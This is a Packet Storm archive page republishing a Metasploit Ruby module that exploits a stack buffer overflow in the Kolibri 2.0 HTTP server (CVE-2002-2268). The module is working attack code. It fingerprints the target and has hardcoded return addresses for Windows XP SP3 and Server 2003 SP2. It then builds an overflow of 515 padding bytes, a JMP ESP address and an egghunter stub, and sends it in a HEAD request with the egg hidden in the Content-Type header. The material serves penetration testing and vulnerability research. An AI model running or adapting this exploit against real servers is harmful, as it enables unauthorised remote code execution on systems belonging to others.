exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Kolibri 2.0 HTTP Server HEAD Buffer Overflow

Kolibri 2.0 HTTP Server HEAD Buffer Overflow
Posted Mar 14, 2011
Authored by TheLeader, mr_me | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.

tags | exploit, web, overflow
advisories | CVE-2002-2268, OSVDB-70808
SHA-256 | 5149ddbaf7b1d3d9357540ac0e57dbcd18547c2741a0e179a370629a91a6669b

Kolibri 2.0 HTTP Server HEAD Buffer Overflow

Change Mirror Download
##
# $Id: kolibri_http.rb 10887 2011-08-03 12:19:19Z mr_me $

##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] }

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow',
'Description' => %q{This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.},
'Author' =>
[
'mr_me <steventhomasseeley@gmail.com>', # msf
'TheLeader' # original exploit
],
'Version' => '$Revision: 10887 $',
'References' =>
[
[ 'CVE', '2002-2268' ],
[ 'OSVDB', '70808' ],
[ 'BID', '6289' ],
[ 'URL', 'http://www.exploit-db.com/exploits/15834/' ],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 3000,
'DisableNops' => true,
'BadChars' => "\x00\x0d\x0a\x3d\x20\x3f",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP sp3', { 'Ret' => 0x7E429353 } ] ,
[ 'Windows Server 2003 sp2', { 'Ret' => 0x76F73BC3 } ] ,
],
'DisclosureDate' => 'Dec 26 2010',
'DefaultTarget' => 0))
end

def check
info = http_fingerprint
if info and (info =~ /kolibri-2\.0/)
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end

def exploit
#7E429353 FFE4 JMP ESP
# For a reliable and large payload, we use an egg hunter
# and direct RET to execute code
print_status("Sending request...")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars)
sploit = Rex::Text.rand_text_alphanumeric(515) + [target.ret].pack('V')
sploit << eh_stub
send_request_raw({
'uri' => "/" + sploit,
'version' => '1.1',
'method' => 'HEAD',
'headers' => {'Content-Type' => eh_egg},
})

handler
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close